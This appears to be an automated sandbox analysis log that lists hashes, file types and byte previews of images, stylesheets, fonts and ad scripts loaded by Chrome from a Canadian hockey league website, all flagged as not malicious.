                                                                                                                          URL:https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/09/18145918/Game-Day-Meals-for-the-Season-1600x900-2-730x411.jpg
                                                                                                                          Preview:......JFIF.....&.&.....C....................................................................C............................................................................".........................................h............................!1.AQa.."q..2.#BRbr.........378u.......4CSVWs...$6TUcv....%(EXet..&'5DF..G.................................H..........................!1AQ.aq....."....2R..#3Bbr.....$45....CScs..............?.. .......X]c..... ..tl..3...m...J..s.Lr...+... ...O.8O(;#d.=..".9.... ........l+.....=.Ba.a].......0.x@NI......+.d.L....L..Pn.\..b..+.Y&... .&....P.LA....$.bm.6.A....U...(...$+.e^.........l...!.<"BF.bb.$$...Q0<!.`.BF.1...,.....YW....,.......YU..lY.(..n..{L..Qn..o.$... m......h....;LM....i..,....D[.!F`..*....vy..!.*. ..,(.Ra.YTS..>1f<`..A..*JA.(....."..Tl.....|!H.&..).).X..R..L!PP;."............*...VS.IL!H1 ri..).)..H0.0.S._9L!.1....8...B..B.9.H.#. ).*..s.P.}.EjN9.L!|.0.x..9.....a..&.I...x).*....G..jLH...B...I.^F!.....FB..B(E..Y...P....I.\....F..j
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (803)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):624664
                                                                                                                          Entropy (8bit):4.9657897746371535
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:Op7pQA3hGtmOKGbndpLemIVT+t8V6CX6Y3BlPtt9vRh1uuAAEf4jdEFH2RPOSN57:FFIVT+t8V6s6Y3BlPtt9vRh1uuAAEf4n
                                                                                                                          MD5:AE2111EDEE5B0480B4967B66B95AA2FC
                                                                                                                          SHA1:8EE44B0880B31AA0042423A212C537732ED8B548
                                                                                                                          SHA-256:2FCECB85081C80A441EB0316EB39732E436875C554928F45F8BC509CE0F2F8D8
                                                                                                                          SHA-512:F9028E20289CC12CC1E4EA086E2B085CF7D1405B8F43A51F2ACC0C772DA337F206CD60404646249864CF11C1D205DF3D3F1DC53E1B28B2CEF5DCF2D90A4C0BA9
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:/**. * React (with addons) v0.12.1. */.!function(e){if("object"==typeof exports&&"undefined"!=typeof module)module.exports=e();else if("function"==typeof define&&define.amd)define([],e);else{var f;"undefined"!=typeof window?f=window:"undefined"!=typeof global?f=global:"undefined"!=typeof self&&(f=self),f.React=e()}}(function(){var define,module,exports;return (function e(t,n,r){function s(o,u){if(!n[o]){if(!t[o]){var a=typeof require=="function"&&require;if(!u&&a)return a(o,!0);if(i)return i(o,!0);var f=new Error("Cannot find module '"+o+"'");throw f.code="MODULE_NOT_FOUND",f}var l=n[o]={exports:{}};t[o][0].call(l.exports,function(e){var n=t[o][1][e];return s(n?n:e)},l,l.exports,e,t,n,r)}return n[o].exports}var i=typeof require=="function"&&require;for(var o=0;o<r.length;o++)s(r[o]);return s})({1:[function(_dereq_,module,exports){./**. * Copyright 2013-2014, Facebook, Inc.. * All rights reserved.. *. * This source code is licensed under the BSD-style license found in the. * LICENSE fil
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):2374
                                                                                                                          Entropy (8bit):4.912172269171876
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:08I7KCEhfvStpzifLMz5yd/pqKd9L0J7HcyWJ1O4S1m3:jCKCowydx1d9QVcyW7O4S1u
                                                                                                                          MD5:BEAD30B2DC0D930E1790C7346A37E1D6
                                                                                                                          SHA1:4D04D6E262863ECF4CF9D1F14C8ECB99A2B14A88
                                                                                                                          SHA-256:CF7391B5C06A56E0F70F64B89ED9D42FD6CCC2EFED6EA005237C39DC451ED681
                                                                                                                          SHA-512:D2485CE025E68DC4D5D8FC14F222E014ED800ABAE694EEBB7770316325C77E216C92DF083F4AC3823162B4530676213F67D6FFC9F856262CA50D7AC1D8E3800A
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://gthlcanada.com/app/plugins/wpml-cms-nav/res/css/cms-navigation.css?ver=1.4.15
                                                                                                                          Preview:/* style the menu navigation wrap */.#menu-wrap {. background-color: #eee;. /* style the top level hover */. /* menu sections with children */. /* style sections from the dropdown menus */.}.#menu-wrap ul {. background-color: #5798d0;. /* style the links for the top level */.}.#menu-wrap ul a,.#menu-wrap ul a:visited {. text-decoration: none;. color: #000;. border-right: 1px solid #fff;.}.#menu-wrap ul li:hover a,.#menu-wrap ul a:focus,.#menu-wrap ul a:active {. background-color: #5798D0;. color: #000;.}.#menu-wrap ul ul a {. /* style the second level hover */.}.#menu-wrap ul ul a, #menu-wrap ul ul a:visited {. color: #000;.}.#menu-wrap ul ul a:hover {. background: #B3D9FF;.}.#menu-wrap ul ul :hover > a {. background: #B3D9FF;.}.#menu-wrap ul ul li a.selected {. background-color: #D0D8F0;. color: #004D99;.}.#menu-wrap a:hover,.#menu-wrap ul ul a:hover {. color: #000;. background: #5798d0;.}.#menu-wrap :hover > a,.#menu-wrap ul ul :hover > a {. color: #000;. backgr
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:Zstandard compressed data (v0.8+), Dictionary ID: None
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):37639
                                                                                                                          Entropy (8bit):7.989897755186323
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:RYlYscYhaiMbY6ZncqOkiCN04TK5Qnw719cNIQPqmUOKrdEo14uf5U:8hxMbY6Zn/OdCN04T49cNIJvdZfO
                                                                                                                          MD5:8A5D5E4DE547760B2A03B00E9BACA084
                                                                                                                          SHA1:6709CAD396D6B6F21E560EB8F6510EBB495485D2
                                                                                                                          SHA-256:5425C39F335A7C9EA7A7B4FF83CF372E3126B559D97B42E331AC3596D11DF899
                                                                                                                          SHA-512:23AAC26260986B824B4DC0930F6FBCE0F2CF3E1E283545D80E9DFDB6A9FB445D5364A7022F08C0CE0AF134403606728B3936310C7C165387D62F78A0EC95A734
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://static.ctctcdn.com/js/signup-form-widget/current/signup-form-widget.min.js
                                                                                                                          Preview:(./..X|....8*C0..9..@..H..|4..........$uK..>..$r.).c...t..R....<.~...M................X....8Xh....c9.O..8...."..`...*..p.o. ....q>.c]..V<..n$.f..\......@.:lP.1.._;.{...{^....}aj9..8r..L.q...A.`..U....\)Gg.vY.BO..P.8.(.....".i.H..(...Sf)..B.......i...u2..y".z.[Mam.W.......yrN...[.1....i...6...Bm.M.)....i(..i......].#5...0lp...m.P.C.r...P. .pQ.D...&".F..A.u&.......L&.`.L....$H"..!.!>....-.."."h..3...X2...TL....i.+..H.>8z;...4........g2....*.y...r..W.I)L~.j7(M#....:.)?..2.P...w.....H$..g.:.y(g.d.w.XZ..q...5......R^..>.F..../.n#-........e.L...<..y....|...........C.v.=.h~h...N.....t~...q5)..F"..h..m.(../B.5Xb~.m$.4Q.A...p.\]p.H.E....Y.+~.|...Z.cx..4...{.5.OK.o.S:...=...B.C.h......b.vQ../S.i.ru.^..2.'......."....J.'..R{......y......OjI`kae._.Z..d....*..7.l.T..V.O..}..@....@...ma.~ma<..V...}.x....5....J.|.k..LUy....8!....D.~{...'..?H.h."..!~..h>...A.....(W...la8..b..45}..B@2.ft/.| ..[.|S.kj.'.$".,..\]....K....I7..........-.r!......p0.v.1)..
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 77160, version 4.459
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):77160
                                                                                                                          Entropy (8bit):7.996509451516447
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:/MkbAPfd1vyBKwHz4kco36ZvIaBfRPlajyXUA2jVTc:L0nXnHdfRVEAS2
                                                                                                                          MD5:AF7AE505A9EED503F8B8E6982036873E
                                                                                                                          SHA1:D6F48CBA7D076FB6F2FD6BA993A75B9DC1ECBF0C
                                                                                                                          SHA-256:2ADEFCBC041E7D18FCF2D417879DC5A09997AA64D675B7A3C4B6CE33DA13F3FE
                                                                                                                          SHA-512:838FEFDBC14901F41EDF995A78FDAC55764CD4912CCB734B8BEA4909194582904D8F2AFDF2B6C428667912CE4D65681A1044D045D1BC6DE2B14113F0315FC892
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/fonts/fontawesome-webfont.woff2?v=4.7.0
                                                                                                                          Preview:wOF2......-h..........-.........................?FFTM.. .`..r.....(..X.6.$..p..... .....u[R.rGa...*...'.=.:..&..=r.*.......].t..E.n.......1F...@....|....f.m.`.$..@d[BQ.$([U<+(..@P.5..`....>.P..;.(..1..l..h...)..Yy..Ji......|%..^..G..3..n........D..p\Yr .L.P.....t.)......6R.^"S.L~.YR.CXR...4...F.y\[..7n..|.s.q..M..%K......,.....L.t.'....M.,..c..+b....O.s.^.$...z...m...h&gb...v.....'..6.:....s.m.b.1.m0"....*V.....c.$,0ATPT.1.....<..;...`..'.H.?.s.:..ND.....I..$..T..[..b4........,....bl6...IL.i}.&.4.m,'....#....Rw..bu..,K......v....m_-...\H....HH.......?...m..9P...)9.J..$.....8......~.;.r..n.=$.....Nddn.!'....;...8..'.N...!.-..J.........X.=.,......"`:....... {......K!'...-FH....#$~.Z_.......N5VU8F....%.P..........Cp..$.Q.......r.....k.k...3...:R.%....2{.....h%.)8..........ILK.6v.#......,;.6..N.2.hv...........OO..t#....xT..Bf....q^.#....?{.5b.I..%-WZ..b.A...^.1..n5.....NQ.Y'.........S.....!t" .`b3..%....35....fv;....l..9.:jgf?gr..p.x. ..|.. $. e.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 38x38, segment length 16, baseline, precision 8, 730x411, components 3
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):73709
                                                                                                                          Entropy (8bit):7.970386207474714
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:v3YdNmxeNmMxRy2iUXwFaNEauoVsZr6aj3/z1JUXiBRwiy:QCLSJiKQaruoy6QnjBR/y
                                                                                                                          MD5:1FCAF6CB7F3245B889C037FFD95317F0
                                                                                                                          SHA1:751F35EC12FC6B7F224F3D5AE2DD49FDD683172C
                                                                                                                          SHA-256:A95A3DAEE365648CCC51C7B0781A098BAA1C23CA9ADCF8929366ACFCBE2F769C
                                                                                                                          SHA-512:5096BF23FF7E56EFD74D0CEFB1EDBFE08E0DD650C167B89FD7E87F53D3F890981CBC45C6EBCC8E4839E78782338190D0973B06D6F1F3010F817A5B555BD51626
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/12/09110126/Broidy-Rondelet-Beyond-the-Whistle-730x411.jpg
                                                                                                                          Preview:......JFIF.....&.&.....C....................................................................C............................................................................"..........................................O...........................!.1.AQa."q.2....#BR......$3Cbr..S.%c....45s.....'..................................:.......................!1.A.."Q..2a.q..B.....#3...R.$4C.............?..3=.x..f....8X8.#...9...Ns. ....}.|..Q.EKh..z...T...r}#...5.N}`....q>l......>....!."}I ......K........J.....+O.....m.v.\..[iX;.y.\....@....9.#8$...3.J..<...Q.. .xT..U...T1....MM.;..."....\.."!.A...v.>&.J.....V...x.1.iI-Jh.. ..6][i)............M.,.aN.c#.K].;t.-.(.H.q.1....k ..D2..V.YZ.U.y..>,.s...V..iZ....C.T..o...J...m..~p.s.=.."...J.......iof.......j]8Wp2s..`.g....=..g.)l....!.f.mm$..H.~.:.R.....[.u.......A.1. 4.....b...x....=.YM}..y.V8#....{.)'.k..i*$....zJ.v.w..3V...'.s....v{..%n.Q[..B8.....V.....y..e;...<.@-..U.........Qj.rv.C9<c.;.Z..eP.NW..x.QmY'nF2H..a~.vQD.HX.0j.h.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 730x408, components 3
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):67853
                                                                                                                          Entropy (8bit):7.965041072943386
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:H6p9caIb0zrk2nBcPr8aDei4FXZHFkXlohHtWuF9LuGrasCX:H6p7VzrkMcgaD2JFskHtX9uGrasCX
                                                                                                                          MD5:5DDDE54FDF9CC70B26A79CA314ABB274
                                                                                                                          SHA1:56A231F6B4520AD20A3511565969842781AF2C8C
                                                                                                                          SHA-256:D33FEA40F63782B8F7A42F7A958EF3B773394AE0C41DC3FD786DE0CEF3068F9F
                                                                                                                          SHA-512:145C6C69F3418BE6734E88FD380AC92C1ED529619433B3DD9B9E4E5F5F06DFE25FF2D82DDF2D100F0B359A975D67D6BE84DD29E1181D4DB20E6E76D55F2408E6
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/12/16114804/Screenshot-2024-12-16-at-11.47.53-AM-730x408.jpg
                                                                                                                          Preview:......JFIF..............ICC_PROFILE.......appl....mntrRGB XYZ ............acspAPPL....APPL...........................-appl................................................desc...P...bdscm........cprt.......#wtpt........rXYZ........gXYZ........bXYZ........rTRC........aarg....... vcgt...<...0ndin...l...>mmod.......(vcgp.......8bTRC........gTRC........aabg....... aagg....... desc........Display.................................................................................mluc.......&....hrHR........koKR........nbNO........id..........huHU........csCZ........daDK........nlNL........fiFI........itIT........esES........roRO........frCA........ar..........ukUA........heIL........zhTW........viVN........skSK........zhCN........ruRU........enGB........frFR........ms..........hiIN........thTH........caES........enAU........esXL........deDE........enUS........ptBR........plPL........elGR........svSE........trTR........ptPT........jaJP.........E.S.-.2.4.X.3..text....Copyright Apple Inc., 2024..XY
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):6139
                                                                                                                          Entropy (8bit):4.816297052942861
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:Qn0Uv0TgxVxp8DT8DuegSvux8/KRb5De9bYgUbwUPuR6Tfo18h68h/HRi+rSk2Hh:Qh9xVx5u0T2ZmIj3/J2Hfp
                                                                                                                          MD5:5C3E30D06654C003CD59CE79074F4B0B
                                                                                                                          SHA1:B5CB4A3A899C0E473666E5878465E01F51981931
                                                                                                                          SHA-256:D874B4407EC18A37AF2E5B06320FD0A8143C054AA65BB07369F646981F378BEE
                                                                                                                          SHA-512:E47E4B5ED200E1FDE56F56306FD8FAD14A17D4189E69B0A2D101DF0046724DB9F231A75E5D081EB4E743797461D3FEC7032E54B6F89CD851873F501D77CD1858
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://gthlcanada.com/app/plugins/sitepress-multilingual-cms/res/css/language-selector.css?v=3.3.5
                                                                                                                          Preview:/* IE5.5 hacks */.* html #lang_sel,.* html #lang_sel_list {. width: 12em;.}.* html #lang_sel a,.* html #lang_sel_list a {. width: 149px;.}.* html #lang_sel a:visited,.* html #lang_sel_list a:visited {. width: 149px;.}.* html #lang_sel ul ul,.* html #lang_sel_list ul {. top: 18px;.}.* html #lang_sel ul ul a,.* html #lang_sel_list ul a {. width: 150px;.}.* html #lang_sel ul ul a:visited,.* html #lang_sel_list ul a:visited {. width: 150px;.}../* remove all the bullets, borders and padding from the default list styling */.#lang_sel {. height: 32px;. position: relative;. font-family: verdana, arial, sans-serif;. display: inline-block;. /* style the table so that it takes no part in the layout - required for IE to work */. /* style the top level hover */.}.#lang_sel ul {. padding: 0 !important;. margin: 0 !important;. list-style-type: none !important;. /* hide the sub levels and give them a positon absolute so that they take up no room */.}.#lang_sel ul li:hover ul, #lang_sel
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 24.0 (Macintosh), datetime=2023:07:13 14:59:22], baseline, precision 8, 730x365, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):98422
                                                                                                                          Entropy (8bit):7.91678916493404
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:DnN1JdYX3uka1zQ/uysX/bsWrzzDFSGzm33SAzGBvm/5K2+no+VywG9T/bO717kQ:zNnSuk3/YX//rzVl+TGcxN+V9GxK7bs8
                                                                                                                          MD5:3505B35843BE9FBC0DFA7AF75C0AE9BB
                                                                                                                          SHA1:1872844EA73BF462A60DC9DAB6FBFFEC23779931
                                                                                                                          SHA-256:F0B27156B2C875CDF14BE02222BC72808F79E4771848A232F8C14D7DEF277AAD
                                                                                                                          SHA-512:C853EE1C68E722AA44FBCA2604F07E5FACE85B623FBAD20C6147EDA780CEF69D8A6DD8B71E99C6907DEBF66FB752D883031C09F981C74CCF710327A3AAD06C5E
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:......JFIF.....,.,......Exif..MM.*.............................b...........j.(...........1.....!...r.2...........i.................,.......,....Adobe Photoshop 24.0 (Macintosh).2023:07:13 14:59:22......................................................................."...........*.(.....................2...................,.......,..........Adobe_CM......Adobe.d.................................................................................................................................................P...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....K...}a.....n...9..S.lc......H..J.sHld. .[.}?.w.t..l.N....x...f.Sz......@.D....}?....i..]...c..I..hk..}/r8....8i.*M.5I2$...'.:P..U+
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):93
                                                                                                                          Entropy (8bit):4.467358887933035
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:qVvB3tchtvAU/oGLv+XAETeJAtILGXIL0Hac9WGL:qFBdchdATOvGTWrV4HXQGL
                                                                                                                          MD5:CE067101CEBEB71F9031CDF6033604E4
                                                                                                                          SHA1:87B939A5DF8004D18B84D0D357480553D0B54D80
                                                                                                                          SHA-256:136B3DFA7C254F92A9A3513C191C87C05F7C7FF7F82C6D648A33496C3C380593
                                                                                                                          SHA-512:5BE95A9CC6FAB2EC5FCE6056DC09B2E243E91E097BDA13D6568D97EE9E44B06574A3A5545576A2A796A76D3DF496C6216E4B680F58A5D35DCA1FBC25793CC936
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://www.googleadservices.com/pagead/managed/js/activeview/current/reach_worklet.html
                                                                                                                          Preview:<html>..<head>.</head>..<body>. <script src="./reach_worklet.js"></script>.</body>..</html>.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:Zstandard compressed data (v0.8+), Dictionary ID: None
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1341
                                                                                                                          Entropy (8bit):7.796703810919794
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:mhPVlADhqMmAOgpbBxy8ROH4VudUwA84H/SYkl0N721Gb+8F2yENnSLbLq1/2Ru:cP0MMMgVBUHvqHqVeygq+MSvOcRu
                                                                                                                          MD5:D3FCC653F1F33F316CBE67D4F117430E
                                                                                                                          SHA1:15DBEBF41EF26414A5B4952884ACE43AD8FF11C2
                                                                                                                          SHA-256:CD0117C886CC80F8D6CD7077AADEBA7AF41A06885D93E2A82BC6F46463948669
                                                                                                                          SHA-512:F597F31A95BBA24EC857308FC706822886218A7AD2F222B11B21F44DB3A77D24460A55BDC992FC011F9ADFF91360F41FFF362C9386618646901D62727E74E650
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:(./..X.)..L .$0m.t0.........2.Y1w!..F..{..W.............U.p.J.M..:_e.[.+s#.s.UC..3.ki...vv.Z......q[.F.y..V)tR..Fs....}v.k...f6.nK.Q.7."..P...........88.......,A.......CA.zP`H<8....Kxx.`.8"""!!....Eb.... B%..9.R%.........J.K,@,..8,*qN.........h(..S.#m..t#?..O...<.d.........gw.lI.n.NY...fF... .9..H....+.Y.l%9=p..J..z.FU..q...m.Pn%...\g.z...x.].[..jU..n..O...ZO;..%w"...J.............x c.....'x.q...R..khz.<....G.hK.1ps..K##.ZgL..J%.`..Q....;|KW.....r /.<.w...g)[.=5G...-..."m...~.^%.n... ..*....|V....fk.3.w..v....jfK[b.Rf.y[O.X.......F...C...]...2....t.4..5.Tw.;UM..%..B.%$..V..k..... H...5.\C.i.a.1L.H...2.J...V...sM..:c.O!...R..T.8.*......CKKw;w..R.Fz..JT.).hC...M..qg.kX..a..2'f.2rKiJ....>.....4......)HA..a.DQ.9(1....!#"..L$..d..........l.]..b..4...w'X..v(T..E.6..).a..'...B..^..!...W....'..C..4.......$+4.... ..".f.1....S...'e7).......fg2.n....E...i..p.u*.t.,...i0U/...F...m..C%...........^Q...8.........%.I .F....;.!...C[L.T...:pKq|..C....5...K....
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 240x240, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=10, manufacturer=Canon, model=Canon EOS 5D Mark IV, xresolution=162, yresolution=170, resolutionunit=2, software=Adobe Lightroom 8.0 (Macintosh), datetime=2024:12:04 00:49:20], baseline, precision 8, 730x487, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):127407
                                                                                                                          Entropy (8bit):7.870462151965861
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:AtFd3SxGDzQikwX3sn7SPaFP3l1QtRK09Iwspr/:iix+zQGIIaFP3leJ9Cr/
                                                                                                                          MD5:1115A9AF4937C1E49A63FA04E5D3525E
                                                                                                                          SHA1:8657CC5FA8ACEA164034E4155FA0D72C0A19BEAD
                                                                                                                          SHA-256:6B2D0D827449C43B5729838CA7F961F6C0AB7A68CBD5CC6CB559598B9396FC08
                                                                                                                          SHA-512:C043D30468812279E1D45B591C1C48C182973E0C8EE71776F45ABF0520C8B9C5B432A5BB5F9D27DD64E358AA51B911D0CDE7AFE0FF116B103F94C856D781182D
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:......JFIF............W.Exif..II*.......................................................(...........1... .......2...........;.......................i...........d...Canon.Canon EOS 5D Mark IV..................Adobe Lightroom 8.0 (Macintosh).2024:12:04 00:49:20.ALEX TE.ALEXJSTE..!........................."...........'...........0...........2...................0231........................................................................................................................................................94..........94..................................................................................................1...........2....... ...4.......@...5.......X............... .......2024:12:01 19:27:28.2024:12:01 19:27:28.-05:00..-05:00..-05:00...=..@B...53.@B..................F.........f......\D.....192156000129..........F.......................EF24-70mm f/2.8L II USM.1517002438........................................(................................S..............................
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 680x510, components 3
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):78608
                                                                                                                          Entropy (8bit):7.982059281911854
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:wzdsHguEYadFeT4+AwEIoNOKNONQIYB/e9Wb+IvH/0XUA:5XliOs8BE/Uqf6UA
                                                                                                                          MD5:EC25209AA570C7C90CE92C1DAB6E4D28
                                                                                                                          SHA1:570B6B52D598D5A41DBB3A423D20EE7506A19209
                                                                                                                          SHA-256:4E18CF2E42D8C10695D916BE37406983564926C5CBD490E795305CEADF263D74
                                                                                                                          SHA-512:1ED09FE29FA933F31FD33A810E98F4132FB22A183F28177E54458DFA5EC3E9F38DC89BF7DA2CA1DE5AB94481E4358533A50E14815F6AB444485AA6D89095208C
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2019/12/14094644/ELNIU7DXYAAM9hQ.jpg
                                                                                                                          Preview:......JFIF.............4ICC_PROFILE......$appl....mntrRGB XYZ ........... acspAPPL....APPL...........................-appl....%..M8.......................................desc.......ecprt...d...#wtpt........rXYZ........gXYZ........bXYZ........rTRC....... chad.......,bTRC....... gTRC....... desc........Display P3..................................................................................text....Copyright Apple Inc., 2017..XYZ .......Q........XYZ ..........=.....XYZ ......J....7....XYZ ......(8.......para..........ff......Y.......[sf32.......B.......&.......................n...C..............................................!........."$".$.......C............................................................................"................................................................................+>9./*X:.....[.3-p.5.V=.|....U.P....t3...~UP.gUH.]...Hf........1DD.2..@.^p.@.......... .F......``.....C..jA.Gc.0.|...z.W.&.c.l..s........e7H....j,).4...".12,.....I;...-..#....H,K
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JSON data
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):17314
                                                                                                                          Entropy (8bit):6.01678015579979
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:uyRPconBQsA1i7NsWxckJFPNG1LI0+Y6mN7NLdwmFAkoYhE7P1e:NRPcoB/AgyWxdJFFG1s03zJwg7ape
                                                                                                                          MD5:88D942E14982A5D5A7A85500BAB9962A
                                                                                                                          SHA1:2C9B6B733D7346B587756E2FB7FA4DB85DE4A287
                                                                                                                          SHA-256:880A818134B2AF7C067E2CCF0C255CB5F33A7F8D8B9CE7EFAFB1B8B2546A4B41
                                                                                                                          SHA-512:ED1A653F515D6E3BC0713FC6F66E7DBD28A146FBE24865C744743BF29F312BBA4EEF81922C1C8B1505D69613BB4ABED8ABC7A4D6ED0143502D188E25930D6CAC
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://ep1.adtrafficquality.google/getconfig/sodar?sv=200&tid=gpt&tv=m202501070101&st=env
                                                                                                                          Preview:{"sodar_query_id":"I3-FZ9i5Fv75oPwP8ZDY-AI","injector_basename":"sodar2","bg_hash_basename":"jQN_tiOKdJuWkTnZn4oDsZoaZomZcjYfSwgPAXYkMcw","bg_binary":"bUwNYaR9YfO4+7Cs0xz6I536H92eQIFt1Td2GFNOk0ghrcIg1Tz/tlWqOqWq6GiQcSAXOidMkXZN7daLMHffz5RrvgLgd10mvOij6frYN0pA4i6C3z+3O23aNZbXfHYkJywc/jeeSSE7++Uuhjab4FkE3C1lwNmfTfRZRKmkx7pSp4qSsQFG4kUVgX2W2nQHl6AP1iCBbM9j05D0b4S4C7uL5C8lRPakdHvW98rs5+1LeO8SAJngzjdVaplz3nOpUAg5V6IXl0lKfzSIbzxoc6CRWTlczm6MRNabsRsJXSpyQfSpeQ83eTRdtnIF62h2gyWXh/FKuYrsy8MQzVZF+PmmHVmCyI36hkwF3RD7mCKI8uN/5PosaHxC/0HXlUDjM2HZLGJCauWAWdnZQ0GAF11p38O6E2aWz+7VZuIiMfrA7lGjCS+8b66uhd9gu7mVmBrDgL/RKrmfxZ2RFbJZYlOoyUZjhFxiGrt8kDU26hWZjn+x0ocdvhQv1f42O9Arbx/R1S9UB+r1IYdZAfNAhPnz/xYfxbM+mAvqDOmrO8lCp2rnDGrXwKL2Qi2Bm3ewBIJIg/1z3Ol7KzS9CgO2mlHAquAFMYfRdg7ENvWucKR5r6X3pate63kvt3jhDbxu9L4WWluPFzEyBYOx+WmMA1fZAxLVzcWZUNfeagMUAow7cjEL/xjOBl34yP40RY39S1R0OvWYF4kWLkzNQD0pQ39A1sQIu4c8AK/goj6elR3C27joOb86QUKpG4lZ9pcaWDzA5R341uFgCPGp8Mft2AiEGcP7cNcwAxxvZGsDEsL8MG8l1O8zS9UZCaVo7vSc7mbOIYMazOdUyNdq/
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (508)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):2994
                                                                                                                          Entropy (8bit):5.002957444642147
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:+D1iwxsPpMcpindezq95HeHeNFX1QLjQkzEsyHMAstyIiMMcLAc1McLAz0Mym:+D1iwxsbpindezq95He+NFX1QLjQkzEb
                                                                                                                          MD5:029670A7D3E6425D72B01748A1B415B2
                                                                                                                          SHA1:784780A860AD42A983E370B34CA00BB1E17506F6
                                                                                                                          SHA-256:224546EE41F8AACC21CB2067284A16CE5FFFD04BBF79A5E4FC04C810DFE6CE67
                                                                                                                          SHA-512:1532D4B3CB731DBF3D4E969385272B9E4D5867286B31302093ACAEF8E4D93228C8421C8860B7C860AE9EF43512022CC40BA28BA384E8E6BC89F7BF3F7D0AA267
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://gthlcanada.com/app/plugins/wp-polls/polls-js.js?ver=2.7
